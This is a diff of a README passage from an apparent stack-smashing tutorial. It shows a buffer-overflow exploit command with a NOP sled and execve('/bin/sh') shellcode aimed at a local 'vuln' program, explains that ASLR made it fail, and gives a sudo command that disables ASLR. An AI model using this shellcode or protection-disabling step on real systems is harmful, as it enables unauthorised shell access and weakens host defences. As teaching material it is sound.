daedalus/stack_smashing/README.md

 ./vuln $(python -c 'print "\x90" * (524-22-30+2) + "\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05" + "\x7f\xff\xff\xff\xde\xad"[::-1] * 5  ')
 Segmentation fault
 ```
-WTF? why didn't work?\
+WTF? why it didn't work?\
-Newer versions of linux include ASLR or Address space layout randomization.\
+Newer versions of linux include _Address space layout randomization_ or _ASLR_ for short.\
-ASLR is a technique of address randomization witch re arranges the internal mappings of the sections of a process memory.\
+_ASLR_ is a technique of address randomization witch rearranges the internal mappings of the sections of a process memory.\
-Our exploit didn't work beacuse we are asumming our program stack is going to be fixed in the range **0x7ffffffde000-0x7ffffffff000** and ASLR efectively prevents it to work beacuse in linux is enabled by defaut.\
+Our exploit didn't work beacuse we are asumming our program stack is going to be in the fixed range **0x7ffffffde000-0x7ffffffff000** and _ASLR_ efectively prevents it to work beacuse in linux is enabled by defaut.\

-But we can disable it momentarily
+But we can disable it momentarily:
 ```
 echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
 ```